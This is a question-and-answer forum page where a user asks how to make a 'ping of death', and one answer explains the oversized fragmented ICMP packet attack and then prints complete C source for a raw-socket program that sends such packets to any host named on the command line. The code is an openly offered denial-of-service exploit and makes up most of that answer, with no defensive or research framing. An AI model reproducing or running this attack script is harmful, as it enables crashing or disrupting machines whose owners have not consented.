Question:

Pals help me!!! how to make ping O'death?

by  |  earlier

0 LIKES UnLike

Pals help me!!! how to make ping O'death?

 Tags:

   Report

2 ANSWERS


  1. The Ping Of Death, the PoD, or the Ping O' Death is in theory a ping, of death.

    A Ping is a computer network tool used to test whether a particular host is reachable across an IP network; it is also used to self test the network interface card of the computer. It works by sending ICMP “echo request” packets to the target host and listening for ICMP “echo response” replies. Ping estimates the round-trip time, generally in milliseconds, and records any packet loss, and prints a statistical summary when finished.

    In  a nut shell , it checks to see if the host / server is online. Your browser does this automaticly while going to a website, eg: http://www.yahoo.com.

    A ping is normally 64 bytes in size (or 84 bytes when IP header is considered); many computer systems cannot handle a ping larger than the maximum IP packet size, which is 65,535 bytes. So, in theory, sending a ping larger than 65,535 bytes, would crash the targeted computer.

    However, there is a problem, Network Protocol doesnt allow ping packets larger than the maximum packet size. End of the road? NOPE!

    A packet of such a size can be sent if it is fragmented; when the target computer reassembles the packet, a buffer overflow can occur, which often causes a system crash.

    Think you can go into notepad, and write a batch script that pings a server a bunch of times? no, sadly, you cannot, as this would just be sending a server a bunch of 64 byte packets.

    You can do this though:

    /*

    * Script Written by Neil

    */

    #include <stdio.h>

    #include <sys/types.h>

    #include <sys/socket.h>

    #include <netdb.h>

    #include <netinet/in.h>

    #include <netinet/in_systm.h>

    #include <netinet/ip.h>

    #include <netinet/ip_icmp.h>

    /*

    * If your kernel doesn't muck with raw packets, #define REALLY_RAW.

    * This is probably only Linux.

    */

    #ifdef REALLY_RAW

    #define FIX(x)  htons(x)

    #else

    #define FIX(x)  (x)

    #endif

    int

    main(int argc, char **argv)

    {

            int s;

            char buf[1500];

            struct ip *ip = (struct ip *)buf;

            struct icmp *icmp = (struct icmp *)(ip + 1);

            struct hostent *hp;

            struct sockaddr_in dst;

            int offset;

            int on = 1;

            bzero(buf, sizeof buf);

            if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {

                    perror("socket");

                    exit(1);

            }

            if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {

                    perror("IP_HDRINCL");

                    exit(1);

            }

            if (argc != 2) {

                    fprintf(stderr, "usage: %s hostname\n", argv[0]);

                    exit(1);

            }

            if ((hp = gethostbyname(argv[1])) == NULL) {

                    if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {

                            fprintf(stderr, "%s: unknown host\n", argv[1]);

                    }

            } else {

                    bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);

            }

            printf("Sending to %s\n", inet_ntoa(ip->ip_dst));

            ip->ip_v = 4;

            ip->ip_hl = sizeof *ip >> 2;

            ip->ip_tos = 0;

            ip->ip_len = FIX(sizeof buf);

            ip->ip_id = htons(4321);

            ip->ip_off = FIX(0);

            ip->ip_ttl = 255;

            ip->ip_p = 1;

            ip->ip_sum = 0;                 /* kernel fills in */

            ip->ip_src.s_addr = 0;          /* kernel fills in */

            dst.sin_addr = ip->ip_dst;

            dst.sin_family = AF_INET;

            icmp->icmp_type = ICMP_ECHO;

            icmp->icmp_code = 0;

            icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));

                    /* the checksum of all 0's is easy to compute */

            for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {

                    ip->ip_off = FIX(offset >> 3);

                    if (offset < 65120)

                            ip->ip_off |= FIX(IP_MF);

                    else

                            ip->ip_len = FIX(418);  /* make total 65538 */

                    if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,

                                            sizeof dst) < 0) {

                            fprintf(stderr, "offset %d: ", offset);

                            perror("sendto");

                    }

                    if (offset == 0) {

                            icmp->icmp_type = 0;

                            icmp->icmp_code = 0;

                            icmp->icmp_cksum = 0;

                    }

            }

    }

    /* end */


  2. b4 i answer it wat is a ping pon death?

Question Stats

Latest activity: earlier.
This question has 2 answers.

BECOME A GUIDE

Share your knowledge and help people by answering questions.
Unanswered Questions